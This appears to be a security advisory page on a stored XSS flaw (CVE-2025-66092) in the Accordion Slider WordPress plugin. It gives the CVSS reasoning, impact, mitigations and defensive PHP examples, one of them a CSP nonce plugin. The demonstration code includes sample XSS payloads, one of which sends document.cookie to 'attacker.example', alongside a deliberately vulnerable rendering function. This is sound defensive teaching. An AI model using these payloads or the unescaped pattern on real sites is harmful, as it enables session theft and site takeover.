CVE-2025-66092: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in bqworks Accordion Slider
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bqworks Accordion Slider (accordion-slider) allows Stored XSS. This issue affects Accordion Slider: from n/a through <= 1.9.13.
AI Analysis
Technical Summary
CVE-2025-66092 is a stored cross-site scripting (XSS) vulnerability in the bqworks Accordion Slider WordPress plugin (slug accordion-slider), which renders accordion-style content sliders. Classified as CWE-79 (improper neutralization of input during web page generation), it arises when user-supplied slider content is stored and later written into page markup without context-appropriate encoding, so an injected script executes in the browser of every user who views the affected page. All releases up to and including 1.9.13 are affected.

The CVSS v3.1 vector given for the issue is AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L, a base score of 6.5 (medium). PR:L means the attacker needs an authenticated account with low privileges, in practice a role that can create or edit slider content; UI:R means a victim must load a page that renders the stored payload. S:C reflects that the script runs in the victim's browser, outside the security scope of the vulnerable server-side component, and the three Low impacts correspond to what a script can do in that browser context: read data exposed to JavaScript, act as the victim, and alter or deface the page.

No exploitation in the wild has been reported. The practical risks are the usual ones for stored XSS: session or token theft where cookies are readable by script, actions performed with the victim's privileges (including higher-privileged users such as administrators who view the same page), defacement, and redirection to attacker-controlled sites. Because the payload is stored, every visitor to the affected page is a potential victim, so the impact scales with site traffic and with the privileges of the users who view it. At the time of publication no fixed version was listed, so operators should rely on access restrictions, output encoding and monitoring until an update is available.
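The flaw class described above, shown as an added example (this is not code from the Accordion Slider plugin, whose affected code path the advisory does not publish): a hypothetical panel record with attacker-controlled title, image URL and caption is rendered once by raw string concatenation and once with WordPress's per-context escapers. The panel field names, the sample payloads and the stand-alone shim functions are constructed for the demonstration; inside WordPress the real esc_attr(), esc_url() and wp_kses_post() are used.

```php
<?php
// Added example, not code from the Accordion Slider plugin. Field names are
// hypothetical; what is shown is the generic CWE-79 stored-XSS pattern and the
// WordPress-idiomatic fix: encode for the output context when the HTML is built.

// Shims so the file also runs under plain `php render_panel.php`. Inside
// WordPress these are not defined and the real functions are used instead.
if ( ! function_exists( 'esc_attr' ) ) {
	function esc_attr( $text ) {
		return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
	}
	function esc_html( $text ) {
		return esc_attr( $text );
	}
	function esc_url( $url ) {
		// Conservative stand-in: WordPress allows a list of schemes plus relative
		// paths; the shim keeps only http(s) URLs and drops javascript:, data:, etc.
		$url = trim( (string) $url );
		return preg_match( '#^https?://#i', $url ) ? esc_attr( $url ) : '';
	}
	function wp_kses_post( $html ) {
		// WordPress keeps an allow-list of safe tags and attributes; the shim is
		// stricter and treats the caption as plain text.
		return esc_html( $html );
	}
}

// Constructed sample of what a low-privileged user might save as one panel.
// Each field carries a payload aimed at a different output context.
$stored_panel = array(
	'title'   => 'Summer sale" onmouseover="alert(document.cookie)',   // attribute breakout
	'image'   => 'javascript:alert(1)',                                   // scheme abuse in src
	'caption' => '<p>50% off</p><script>fetch("//attacker.example/?c="+document.cookie)</script>',
);

/** Vulnerable pattern: stored values concatenated straight into markup. */
function render_panel_vulnerable( array $panel ): string {
	return '<div class="panel" title="' . $panel['title'] . '">'
		. '<img src="' . $panel['image'] . '" alt="">'
		. '<div class="caption">' . $panel['caption'] . '</div>'
		. '</div>';
}

/** Hardened pattern: one encoder per context, applied at render time. */
function render_panel_hardened( array $panel ): string {
	return '<div class="panel" title="' . esc_attr( $panel['title'] ) . '">'      // " becomes &quot;
		. '<img src="' . esc_url( $panel['image'] ) . '" alt="">'                 // javascript: becomes ''
		. '<div class="caption">' . wp_kses_post( $panel['caption'] ) . '</div>'  // <script> is removed
		. '</div>';
}

/** Heuristic for this demo only (not a general XSS detector): does the output
 *  still contain a live script vector, i.e. a <script> tag, an event handler
 *  following a closing quote, or a javascript: src? */
function has_script_vector( string $html ): bool {
	return (bool) preg_match( '#<script\b|"\s+on\w+\s*="|src="javascript:#i', $html );
}

echo 'vulnerable: ', render_panel_vulnerable( $stored_panel ), PHP_EOL;
echo 'hardened  : ', render_panel_hardened( $stored_panel ), PHP_EOL;
echo 'vulnerable output carries attacker script? ',
	has_script_vector( render_panel_vulnerable( $stored_panel ) ) ? 'yes' : 'no', PHP_EOL;
echo 'hardened output carries attacker script?   ',
	has_script_vector( render_panel_hardened( $stored_panel ) ) ? 'yes' : 'no', PHP_EOL;
```

The point of the contrast is that the same stored record is safe or unsafe depending only on what happens at output: the title payload is neutralised by attribute encoding, the image payload by URL scheme filtering, and the caption payload by an allow-list sanitizer, and none of these depend on input having been validated when it was saved.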
Potential Impact
For European organizations running WordPress sites with this plugin, successful exploitation means attacker-controlled JavaScript executing in the browsers of staff or customers who view the affected page. The consequences are those of any stored XSS: theft of data the page or its APIs expose to script, actions taken with the victim's session (content changes, account changes, or, when the victim is an administrator, anything the WordPress dashboard allows), defacement, and redirection to phishing or malware. Reputational damage, data breaches and service disruption follow from these. Exposure includes public marketing sites, customer portals and intranets alike, so both internal users and external customers may be affected.

The medium severity reflects the preconditions rather than a low ceiling on impact. Exploitation needs an account that can save slider content and a victim who views the result; on sites with many contributors, guest authors or loosely managed roles those preconditions are easy to meet, and a payload that reaches an administrator can turn a low-privilege foothold into full site compromise, especially when combined with social engineering or other weaknesses. The scope change in the CVSS vector captures exactly this: the damage is done in the victim's browser, outside the plugin's own security boundary, not inside the plugin itself.
Mitigation Recommendations
1. Watch the bqworks site, the WordPress.org plugin listing and the Patchstack advisory for a release later than 1.9.13 that addresses CVE-2025-66092, and update as soon as one is published. Until then, deactivate the plugin on sites where untrusted users hold accounts able to edit slider content.
2. Encode at output time, not only at input time. Any theme template, shortcode or custom code that echoes slider data must use the WordPress escaper for its context (esc_html() for text, esc_attr() for attribute values, esc_url() for URLs, wp_kses_post() for rich text). Input validation alone does not fix XSS, because the data has already been stored.
3. Apply least privilege. Limit the ability to create or edit sliders to trusted roles, review Contributor and Author accounts, and remove or downgrade stale ones. WordPress filters post content through KSES for users without the unfiltered_html capability, but plugin-specific fields are only filtered if the plugin does so itself.
4. Treat a WAF as defence in depth only. Signature rules for common XSS payloads raise the bar for casual attackers, but they are routinely bypassed with encoding and obfuscation, and they do nothing about payloads already stored in the database.
5. Audit custom code and integrations that read slider data for unescaped output, and re-check after plugin updates.
6. Educate content contributors and enforce editorial review, so that content from low-privileged accounts is checked before it appears on pages viewed by others.
7. Where feasible, replace the plugin with an actively maintained alternative with a better security track record.
8. Look for both exploitation attempts and stored payloads: inspect the slider data in the database for <script tags, on*= event handlers, javascript: URLs and data: URLs, and correlate web server logs for POST requests from low-privileged accounts that carry such strings. Because the attack is stored, the database is the authoritative place to check, not only the logs.
9. Deploy a Content Security Policy that disallows inline scripts (nonce- or hash-based script-src, no 'unsafe-inline'). This stops most injected scripts from executing even when encoding fails. Start in Content-Security-Policy-Report-Only mode, because WordPress core, themes and plugins frequently emit inline scripts that must be nonced or removed before the policy can be enforced.
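Mitigation 9 in working form, as an added example that is not part of the plugin or of WordPress core: a must-use plugin that sends a nonce-based CSP and attaches the same nonce to every script tag WordPress prints, so a script injected into stored content has no nonce and is refused by the browser. It assumes WordPress 5.7 or later (for the wp_script_attributes and wp_inline_script_attributes filters) and a hypothetical report collector at /csp-report; the constant and function names are the example's own.

```php
<?php
/**
 * Plugin Name: CSP nonce example (added mitigation example)
 *
 * Added example, not part of Accordion Slider or WordPress core. Install by
 * copying to wp-content/mu-plugins/csp-nonce-example.php. Assumptions: WP 5.7+
 * (for the two attribute filters below) and a report collector at /csp-report,
 * which WordPress does not provide.
 */

defined( 'ABSPATH' ) || exit;

// Roll out in report-only mode first: themes and plugins often emit inline
// <script> blocks that will show up as violations until nonced or removed.
const CSP_EXAMPLE_REPORT_ONLY = true;

/** One unguessable nonce per request, shared by the header and every script tag. */
function csp_example_nonce(): string {
	static $nonce = null;
	if ( null === $nonce ) {
		$nonce = base64_encode( random_bytes( 16 ) );
	}
	return $nonce;
}

/** Build the policy. No 'unsafe-inline' in script-src: that is what neutralises stored XSS. */
function csp_example_policy( string $nonce ): string {
	return implode( '; ', array(
		"default-src 'self'",
		// 'strict-dynamic' lets nonced scripts load further scripts; browsers that
		// support it ignore the 'self' host source, which is kept as a fallback.
		"script-src 'nonce-{$nonce}' 'strict-dynamic' 'self'",
		"object-src 'none'",
		"base-uri 'self'",
		"frame-ancestors 'self'",
		"form-action 'self'",
		"img-src 'self' data: https:",
		// Core still prints inline <style>; style injection is out of scope here.
		"style-src 'self' 'unsafe-inline'",
		'report-uri /csp-report', // hypothetical collector
	) );
}

// 1. Send the header. The send_headers action fires for front-end requests
//    handled by WP::main(), so wp-admin (heavily inline-script based) is not
//    touched by this example.
add_action( 'send_headers', function () {
	$name = CSP_EXAMPLE_REPORT_ONLY ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy';
	header( $name . ': ' . csp_example_policy( csp_example_nonce() ) );
} );

// 2. Attach the same nonce to every <script> WordPress prints itself: enqueued
//    files (wp_script_attributes) and core-printed inline scripts
//    (wp_inline_script_attributes). A <script> injected into stored content is
//    printed without a nonce and therefore blocked (or reported) by the browser.
$csp_example_add_nonce = function ( array $attributes ): array {
	$attributes['nonce'] = csp_example_nonce();
	return $attributes;
};
add_filter( 'wp_script_attributes', $csp_example_add_nonce );
add_filter( 'wp_inline_script_attributes', $csp_example_add_nonce );
```

While the policy is in report-only mode, watch the collector (or the browser console) for violations caused by legitimate theme or plugin inline scripts, move those to wp_add_inline_script() or nonce them, and only then set CSP_EXAMPLE_REPORT_ONLY to false. A CSP does not remove the stored payload or fix the missing encoding; it limits what the payload can do once it reaches a browser.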
Affected Countries
Germany, United Kingdom, France, Italy, Spain, Netherlands, Poland, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: Patchstack
- Date Reserved: 2025-11-21T11:21:04.795Z
- Cvss Version: null
- State: PUBLISHED
Threat ID: 69205c31c36be036e6ff275e
Added to database: 11/21/2025, 12:33:53 PM
Last enriched: 11/28/2025, 10:26:09 PM
Last updated: 1/7/2026, 5:23:17 AM
Related Threats
- CVE-2026-0650: CWE-306 Missing Authentication for Critical Function in OpenFlagr Flagr (Critical)
- CVE-2025-15474: CWE-770 Allocation of Resources Without Limits or Throttling in AuntyFey AuntyFey Smart Combination Lock (Medium)
- CVE-2025-14468: CWE-352 Cross-Site Request Forgery (CSRF) in mohammed_kaludi AMP for WP – Accelerated Mobile Pages (Medium)
- CVE-2025-9611: CWE-749 Exposed Dangerous Method or Function in Microsoft Playwright (High)
- CVE-2026-22162 (Unknown)